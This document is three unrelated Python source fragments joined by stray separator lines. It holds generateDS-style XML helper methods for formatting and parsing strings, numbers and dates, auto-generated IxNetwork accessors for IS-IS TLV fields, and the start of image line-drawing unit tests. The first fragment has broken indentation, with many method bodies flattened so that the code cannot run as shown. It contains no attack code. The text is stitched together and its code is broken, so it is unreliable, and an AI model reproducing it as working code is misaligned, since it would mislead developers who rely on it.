        class _FixedOffsetTZ(datetime_.tzinfo):
            """tzinfo with a constant UTC offset (in minutes) and a fixed name."""
            def __init__(self, offset, name):
                self.__offset = datetime_.timedelta(minutes=offset)
                self.__name = name
            def utcoffset(self, dt):
                # Constant offset regardless of the datetime value.
                return self.__offset
            def tzname(self, dt):
                return self.__name
            def dst(self, dt):
                # Fixed-offset zones carry no daylight-saving adjustment.
                return None
        def gds_format_string(self, input_data, input_name=''):
            """Render a string value for XML export (returned unchanged)."""
            return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
        def gds_format_base64(self, input_data, input_name=''):
            """Base64-encode binary content for XML export.

            NOTE(review): on Python 3, b64encode expects bytes and returns
            bytes - callers must handle the bytes result.
            """
            return base64.b64encode(input_data)
        def gds_validate_base64(self, input_data, node=None, input_name=''):
            """Validate base64 content; no checking is performed here."""
            return input_data
        def gds_format_integer(self, input_data, input_name=''):
            """Render an integer value for XML export using '%d' formatting."""
            return '%d' % input_data
        def gds_validate_integer(self, input_data, node=None, input_name=''):
            """Validate an integer value; returned as-is (no checking here)."""
            return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return values
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
        def gds_validate_float(self, input_data, node=None, input_name=''):
            """Validate a float value; returned as-is (no checking here)."""
            return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_float_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return values
        def gds_format_double(self, input_data, input_name=''):
            """Render a double value for XML export in scientific notation ('%e')."""
            return '%e' % input_data
        def gds_validate_double(self, input_data, node=None, input_name=''):
            """Validate a double value; returned as-is (no checking here)."""
            return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_double_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return values
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node=None, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return values
def gds_validate_datetime(self, input_data, node=None, input_name=''):
return input_data
    def gds_format_datetime(self, input_data, input_name=''):
        """Format a datetime as an XSD xs:dateTime lexical string.

        Microseconds are emitted only when non-zero, and a UTC-offset
        suffix ('Z' or '+HH:MM'/'-HH:MM') is appended when *input_data*
        is timezone-aware.
        """
        if input_data.microsecond == 0:
            _svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
                input_data.year,
                input_data.month,
                input_data.day,
                input_data.hour,
                input_data.minute,
                input_data.second,
            )
        else:
            _svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
                input_data.year,
                input_data.month,
                input_data.day,
                input_data.hour,
                input_data.minute,
                input_data.second,
                # Render microseconds as exactly six fractional digits by
                # formatting the fraction 0.xxxxxx and dropping the "0.".
                ('%f' % (float(input_data.microsecond) / 1000000))[2:],
            )
        if input_data.tzinfo is not None:
            tzoff = input_data.tzinfo.utcoffset(input_data)
            if tzoff is not None:
                # timedelta stores days+seconds; fold into a single total.
                total_seconds = tzoff.seconds + (86400 * tzoff.days)
                if total_seconds == 0:
                    _svalue += 'Z'
                else:
                    if total_seconds < 0:
                        _svalue += '-'
                        total_seconds *= -1
                    else:
                        _svalue += '+'
                    hours = total_seconds // 3600
                    minutes = (total_seconds - (hours * 3600)) // 60
                    _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
        return _svalue
    @classmethod
    def gds_parse_datetime(cls, input_data):
        """Parse an XSD xs:dateTime string into a datetime.datetime.

        Handles an optional trailing 'Z' or '+HH:MM'/'-HH:MM' offset and
        an optional fractional-seconds part; the result carries a fixed
        tzinfo when an offset was present, otherwise it is naive.
        """
        tz = None
        if input_data[-1] == 'Z':
            tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
            input_data = input_data[:-1]
        else:
            results = GeneratedsSuper.tzoff_pattern.search(input_data)
            if results is not None:
                tzoff_parts = results.group(2).split(':')
                tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                if results.group(1) == '-':
                    tzoff *= -1
                tz = GeneratedsSuper._FixedOffsetTZ(
                    tzoff, results.group(0))
                # Drop the 6-character "+HH:MM" suffix before parsing.
                input_data = input_data[:-6]
        time_parts = input_data.split('.')
        if len(time_parts) > 1:
            # Normalise the fraction to exactly six digits so %f accepts it.
            micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
            input_data = '%s.%s' % (
                time_parts[0], "{}".format(micro_seconds).rjust(6, "0"), )
            dt = datetime_.datetime.strptime(
                input_data, '%Y-%m-%dT%H:%M:%S.%f')
        else:
            dt = datetime_.datetime.strptime(
                input_data, '%Y-%m-%dT%H:%M:%S')
        dt = dt.replace(tzinfo=tz)
        return dt
def gds_validate_date(self, input_data, node=None, input_name=''):
return input_data
    def gds_format_date(self, input_data, input_name=''):
        """Format a date as an XSD xs:date lexical string.

        A UTC-offset suffix is appended when the value exposes a tzinfo;
        plain ``datetime.date`` objects have no tzinfo attribute, so the
        AttributeError path simply skips the suffix.
        """
        _svalue = '%04d-%02d-%02d' % (
            input_data.year,
            input_data.month,
            input_data.day,
        )
        try:
            if input_data.tzinfo is not None:
                tzoff = input_data.tzinfo.utcoffset(input_data)
                if tzoff is not None:
                    # timedelta stores days+seconds; fold into one total.
                    total_seconds = tzoff.seconds + (86400 * tzoff.days)
                    if total_seconds == 0:
                        _svalue += 'Z'
                    else:
                        if total_seconds < 0:
                            _svalue += '-'
                            total_seconds *= -1
                        else:
                            _svalue += '+'
                        hours = total_seconds // 3600
                        minutes = (total_seconds - (hours * 3600)) // 60
                        _svalue += '{0:02d}:{1:02d}'.format(
                            hours, minutes)
        except AttributeError:
            # datetime.date has no tzinfo attribute -- best-effort only.
            pass
        return _svalue
    @classmethod
    def gds_parse_date(cls, input_data):
        """Parse an XSD xs:date string into a datetime.date.

        An optional trailing 'Z' or '+HH:MM'/'-HH:MM' offset is consumed;
        the tzinfo is applied to the intermediate datetime before the
        date portion is returned.
        """
        tz = None
        if input_data[-1] == 'Z':
            tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
            input_data = input_data[:-1]
        else:
            results = GeneratedsSuper.tzoff_pattern.search(input_data)
            if results is not None:
                tzoff_parts = results.group(2).split(':')
                tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                if results.group(1) == '-':
                    tzoff *= -1
                tz = GeneratedsSuper._FixedOffsetTZ(
                    tzoff, results.group(0))
                # Drop the 6-character "+HH:MM" suffix before parsing.
                input_data = input_data[:-6]
        dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
        dt = dt.replace(tzinfo=tz)
        return dt.date()
def gds_validate_time(self, input_data, node=None, input_name=''):
return input_data
    def gds_format_time(self, input_data, input_name=''):
        """Format a time as an XSD xs:time lexical string.

        Microseconds are emitted only when non-zero; a UTC-offset suffix
        ('Z' or '+HH:MM'/'-HH:MM') is appended when the value is
        timezone-aware.
        """
        if input_data.microsecond == 0:
            _svalue = '%02d:%02d:%02d' % (
                input_data.hour,
                input_data.minute,
                input_data.second,
            )
        else:
            _svalue = '%02d:%02d:%02d.%s' % (
                input_data.hour,
                input_data.minute,
                input_data.second,
                # Six fractional digits: format 0.xxxxxx, drop the "0.".
                ('%f' % (float(input_data.microsecond) / 1000000))[2:],
            )
        if input_data.tzinfo is not None:
            tzoff = input_data.tzinfo.utcoffset(input_data)
            if tzoff is not None:
                # timedelta stores days+seconds; fold into one total.
                total_seconds = tzoff.seconds + (86400 * tzoff.days)
                if total_seconds == 0:
                    _svalue += 'Z'
                else:
                    if total_seconds < 0:
                        _svalue += '-'
                        total_seconds *= -1
                    else:
                        _svalue += '+'
                    hours = total_seconds // 3600
                    minutes = (total_seconds - (hours * 3600)) // 60
                    _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
        return _svalue
def gds_validate_simple_patterns(self, patterns, target):
# pat is a list of lists of strings/patterns.
# The target value must match at least one of the patterns
# in order for the test to succeed.
found1 = True
for patterns1 in patterns:
found2 = False
for patterns2 in patterns1:
mo = re_.search(patterns2, target)
if mo is not None and len(mo.group(0)) == len(target):
found2 = True
break
if not found2:
found1 = False
break
return found1
    @classmethod
    def gds_parse_time(cls, input_data):
        """Parse an XSD xs:time string into a datetime.time.

        An optional trailing 'Z' or '+HH:MM'/'-HH:MM' offset and an
        optional fractional-seconds part are handled; the tzinfo is
        applied before the time portion is returned.
        """
        tz = None
        if input_data[-1] == 'Z':
            tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
            input_data = input_data[:-1]
        else:
            results = GeneratedsSuper.tzoff_pattern.search(input_data)
            if results is not None:
                tzoff_parts = results.group(2).split(':')
                tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                if results.group(1) == '-':
                    tzoff *= -1
                tz = GeneratedsSuper._FixedOffsetTZ(
                    tzoff, results.group(0))
                # Drop the 6-character "+HH:MM" suffix before parsing.
                input_data = input_data[:-6]
        if len(input_data.split('.')) > 1:
            dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
        else:
            dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
        dt = dt.replace(tzinfo=tz)
        return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
    def get_class_obj_(self, node, default_class=None):
        """Resolve the generated class for *node*, honouring xsi:type.

        If the element carries an xsi:type attribute, look the (possibly
        namespace-prefixed) type name up in this module's globals and use
        that class; otherwise fall back to *default_class*.
        """
        class_obj1 = default_class
        if 'xsi' in node.nsmap:
            classname = node.get('{%s}type' % node.nsmap['xsi'])
            if classname is not None:
                names = classname.split(':')
                if len(names) == 2:
                    # Strip the namespace prefix ("ns:Type" -> "Type").
                    classname = names[1]
                class_obj2 = globals().get(classname)
                if class_obj2 is not None:
                    class_obj1 = class_obj2
        return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.items()))
@staticmethod
def gds_encode(instring):
if sys.version_info.major == 2:
| |
self._get_attribute(self._SDM_ATT_MAP['Tlv2RepeatingFieldsDelayMetric']))
    # Auto-generated IxNetwork attribute accessors: each property wraps the
    # SDM attribute of the same name in a Multivalue helper bound to self.
    @property
    def ValuefieldsTlv2RepeatingFieldsSupportedBit(self):
        """
        Display Name: Supported bit
        Default Value: 0
        Value Format: decimal
        Available enum values: Metric unsupported, 1, Metric supported, 0
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValuefieldsTlv2RepeatingFieldsSupportedBit']))
    @property
    def Tlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric(self):
        """
        Display Name: Internal metric
        Default Value: 0
        Value Format: hex
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric']))
    @property
    def Tlv2RepeatingFieldsExpenseMetric(self):
        """
        Display Name: Expense metric
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv2RepeatingFieldsExpenseMetric']))
    @property
    def Tlv2isneighborsValuefieldsTlv2RepeatingFieldsSupportedBit(self):
        """
        Display Name: Supported bit
        Default Value: 0
        Value Format: decimal
        Available enum values: Metric unsupported, 1, Metric supported, 0
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv2isneighborsValuefieldsTlv2RepeatingFieldsSupportedBit']))
    @property
    def TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric(self):
        """
        Display Name: Internal metric
        Default Value: 0
        Value Format: hex
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric']))
    @property
    def ValuefieldsTlv2RepeatingFieldsExpenseMetric(self):
        """
        Display Name: Expense metric
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValuefieldsTlv2RepeatingFieldsExpenseMetric']))
    @property
    def TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsSupportedBit(self):
        """
        Display Name: Supported bit
        Default Value: 0
        Value Format: decimal
        Available enum values: Metric unsupported, 1, Metric supported, 0
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsSupportedBit']))
    # NOTE(review): this is a byte-identical re-definition of the property
    # of the same name declared earlier in this class; Python silently lets
    # this later definition win.  Harmless (both bodies are identical) but
    # redundant -- worth removing in the code generator.
    @property
    def TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric(self):
        """
        Display Name: Internal metric
        Default Value: 0
        Value Format: hex
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['TlvheadertypeTlv2isneighborsValuefieldsTlv2RepeatingFieldsInternalMetric']))
    # Auto-generated IxNetwork attribute accessors (continued): each property
    # wraps the SDM attribute of the same name in a Multivalue helper.
    @property
    def Tlv2RepeatingFieldsErrorMetric(self):
        """
        Display Name: Error metric
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv2RepeatingFieldsErrorMetric']))
    @property
    def NeighborIDNeighborID(self):
        """
        Display Name: Neighbor ID
        Default Value: 0x0
        Value Format: hex
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NeighborIDNeighborID']))
    @property
    def NeighborIDPadding8Bits(self):
        """
        Display Name: Padding - 8 bits
        Default Value: 0
        Value Format: hex
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['NeighborIDPadding8Bits']))
    @property
    def Tlv3EndSystemNeighborsTlvCode(self):
        """
        Display Name: TLV code
        Default Value: 3
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv3EndSystemNeighborsTlvCode']))
    @property
    def Tlv3EndSystemNeighborsTlvLength(self):
        """
        Display Name: TLV length
        Default Value: 10
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv3EndSystemNeighborsTlvLength']))
    @property
    def ValueFieldsReserved(self):
        """
        Display Name: Reserved
        Default Value: 0
        Value Format: hex
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldsReserved']))
    @property
    def ValueFieldsNeighborID(self):
        """
        Display Name: Neighbor ID
        Default Value: 0x0
        Value Format: hex
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldsNeighborID']))
    @property
    def Tlv10AuthenticationInformationTlvCode(self):
        """
        Display Name: TLV code
        Default Value: 10
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv10AuthenticationInformationTlvCode']))
    @property
    def Tlv10AuthenticationInformationTlvLength(self):
        """
        Display Name: TLV length
        Default Value: 4
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv10AuthenticationInformationTlvLength']))
    @property
    def ValueFieldsAuthenticationType(self):
        """
        Display Name: Authentication type
        Default Value: 1
        Value Format: decimal
        Available enum values: Cleartext password, 1, Routing domain private authentication method, 255
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldsAuthenticationType']))
    @property
    def ValueFieldsAuthenticationValue(self):
        """
        Display Name: Authentication value
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldsAuthenticationValue']))
    @property
    def Tlv14OriginatingLSPBufferSizeTlvCode(self):
        """
        Display Name: TLV code
        Default Value: 14
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv14OriginatingLSPBufferSizeTlvCode']))
    @property
    def Tlv14OriginatingLSPBufferSizeTlvLength(self):
        """
        Display Name: TLV length
        Default Value: 1
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv14OriginatingLSPBufferSizeTlvLength']))
    @property
    def Tlv14OriginatingLSPBufferSizeValue(self):
        """
        Display Name: Value
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv14OriginatingLSPBufferSizeValue']))
    @property
    def Tlv22ExtendedISReachabilityTlvCode(self):
        """
        Display Name: TLV code
        Default Value: 22
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv22ExtendedISReachabilityTlvCode']))
    @property
    def Tlv22ExtendedISReachabilityTlvLength(self):
        """
        Display Name: TLV length
        Default Value: 11
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Tlv22ExtendedISReachabilityTlvLength']))
    @property
    def ValueFieldSystemIDAndPseudonodeNumber(self):
        """
        Display Name: System ID and Pseudonode number
        Default Value: 0
        Value Format: hex
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldSystemIDAndPseudonodeNumber']))
    @property
    def ValueFieldDefaultMetric(self):
        """
        Display Name: Default metric
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldDefaultMetric']))
    @property
    def ValueFieldLengthOfSubTLVs(self):
        """
        Display Name: Length of Sub-TLVs
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldLengthOfSubTLVs']))
    @property
    def SubTLVsNoSubTLVs(self):
        """
        Display Name: No sub-TLVs
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLVsNoSubTLVs']))
    # Auto-generated IxNetwork attribute accessors (continued): each property
    # wraps the SDM attribute of the same name in a Multivalue helper.
    @property
    def SubTLV3AdministrativeGroupSubTLVCode(self):
        """
        Display Name: Sub-TLV code
        Default Value: 3
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV3AdministrativeGroupSubTLVCode']))
    @property
    def SubTLV3AdministrativeGroupSubTLVLength(self):
        """
        Display Name: Sub-TLV length
        Default Value: 1
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV3AdministrativeGroupSubTLVLength']))
    @property
    def ValueFieldAdministrativeGroup(self):
        """
        Display Name: Administrative group
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldAdministrativeGroup']))
    @property
    def SubTLV6IPv4InterfaceAddressSubTLVCode(self):
        """
        Display Name: Sub-TLV code
        Default Value: 6
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV6IPv4InterfaceAddressSubTLVCode']))
    @property
    def SubTLV6IPv4InterfaceAddressSubTLVLength(self):
        """
        Display Name: Sub-TLV length
        Default Value: 4
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV6IPv4InterfaceAddressSubTLVLength']))
    @property
    def ValueFieldIpv4InterfaceAddress(self):
        """
        Display Name: IPv4 interface address
        Default Value: 0.0.0.0
        Value Format: iPv4
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldIpv4InterfaceAddress']))
    @property
    def SubTLV8IPv4NeighborAddressSubTLVCode(self):
        """
        Display Name: Sub-TLV code
        Default Value: 8
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV8IPv4NeighborAddressSubTLVCode']))
    @property
    def SubTLV8IPv4NeighborAddressSubTLVLength(self):
        """
        Display Name: Sub-TLV length
        Default Value: 4
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV8IPv4NeighborAddressSubTLVLength']))
    @property
    def ValueFieldIpv4NeighborAddress(self):
        """
        Display Name: IPv4 neighbor address
        Default Value: 0.0.0.0
        Value Format: iPv4
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldIpv4NeighborAddress']))
    @property
    def SubTLV9MaximumLinkBandwidthSubTLVCode(self):
        """
        Display Name: Sub-TLV code
        Default Value: 9
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV9MaximumLinkBandwidthSubTLVCode']))
    @property
    def SubTLV9MaximumLinkBandwidthSubTLVLength(self):
        """
        Display Name: Sub-TLV length
        Default Value: 4
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV9MaximumLinkBandwidthSubTLVLength']))
    @property
    def ValueFieldMaximumLinkBandwidthBytessec(self):
        """
        Display Name: Maximum link bandwidth (Bytes/sec)
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldMaximumLinkBandwidthBytessec']))
    @property
    def SubTLV10ReservableLinkBandwidthSubTLVCode(self):
        """
        Display Name: Sub-TLV code
        Default Value: 10
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV10ReservableLinkBandwidthSubTLVCode']))
    @property
    def SubTLV10ReservableLinkBandwidthSubTLVLength(self):
        """
        Display Name: Sub-TLV length
        Default Value: 2
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV10ReservableLinkBandwidthSubTLVLength']))
    @property
    def ValueFieldAuthenticationType(self):
        """
        Display Name: Authentication type
        Default Value: 1
        Value Format: decimal
        Available enum values: Cleartext password, 1, Routing domain private authentication method, 255
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldAuthenticationType']))
    @property
    def ValueFieldAuthenticationValue(self):
        """
        Display Name: Authentication value
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldAuthenticationValue']))
    @property
    def SubTLV11UnreservedBandwidthSubTLVCode(self):
        """
        Display Name: Sub-TLV code
        Default Value: 11
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV11UnreservedBandwidthSubTLVCode']))
    @property
    def SubTLV11UnreservedBandwidthSubTLVLength(self):
        """
        Display Name: Sub-TLV length
        Default Value: 1
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV11UnreservedBandwidthSubTLVLength']))
    @property
    def ValueFieldUnreservedBandwidthBytessec(self):
        """
        Display Name: Unreserved bandwidth (Bytes/sec)
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldUnreservedBandwidthBytessec']))
    @property
    def SubTLV18TEDefaultMetricSubTLVCode(self):
        """
        Display Name: Sub-TLV code
        Default Value: 18
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV18TEDefaultMetricSubTLVCode']))
    @property
    def SubTLV18TEDefaultMetricSubTLVLength(self):
        """
        Display Name: Sub-TLV length
        Default Value: 1
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV18TEDefaultMetricSubTLVLength']))
    @property
    def ValueFieldTeDefaultMetric(self):
        """
        Display Name: TE Default metric
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldTeDefaultMetric']))
    @property
    def SubTLV28MTUSubTLVCode(self):
        """
        Display Name: Sub-TLV code
        Default Value: 28
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV28MTUSubTLVCode']))
    @property
    def SubTLV28MTUSubTLVLength(self):
        """
        Display Name: Sub-TLV length
        Default Value: 1
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SubTLV28MTUSubTLVLength']))
    @property
    def ValueFieldFBit(self):
        """
        Display Name: F bit
        Default Value: 0
        Value Format: decimal
        Available enum values: F-bit disabled, 0, F-bit enabled, 1
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldFBit']))
    @property
    def ValueFieldReserved(self):
        """
        Display Name: Reserved
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldReserved']))
    @property
    def ValueFieldMtu(self):
        """
        Display Name: MTU
        Default Value: 0
        Value Format: decimal
        """
        from ixnetwork_restpy.multivalue import Multivalue
        return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['ValueFieldMtu']))
@property
| |
100
assert np.sum(img_aa) > 5 * 3 * 100
assert not np.array_equal(img, img_aa)
assert np.all(img[:3, -3:, :] == 0)
assert np.all(img_aa[:3, -3:, :] == 0)
assert np.all(img[-3:, :3, :] == 0)
assert np.all(img_aa[-3:, :3, :] == 0)
    # Tests for LineString.draw_lines_on_image() with lines that are
    # partially or fully outside the image canvas.
    def test_draw_line_on_image_with_line_partially_outside_image(self):
        # line partially outside of image
        ls = LineString([(-1, 1), (9, 1)])
        img = ls.draw_lines_on_image(
            np.zeros((3, 10, 3), dtype=np.uint8),
            color=(10, 200, 20),
            alpha=1.0, size=1,
            antialiased=False,
            raise_if_out_of_image=False
        )
        assert img.dtype.name == "uint8"
        assert np.all(img[0, :, :] == 0)
        assert np.all(img[1, :, 0] == 10)
        assert np.all(img[1, :, 1] == 200)
        assert np.all(img[1, :, 2] == 20)
        assert np.all(img[2, :, :] == 0)
    def test_draw_line_on_image_with_line_fully_outside_image(self):
        # line fully outside of image
        ls = LineString([(-10, 1), (-9, 1)])
        img = ls.draw_lines_on_image(
            np.zeros((3, 10, 3), dtype=np.uint8),
            color=(10, 200, 20),
            alpha=1.0, size=1,
            antialiased=False,
            raise_if_out_of_image=False
        )
        assert img.dtype.name == "uint8"
        assert np.all(img == 0)
    def test_draw_line_on_image_with_line_fully_ooi_and_raise_true(self):
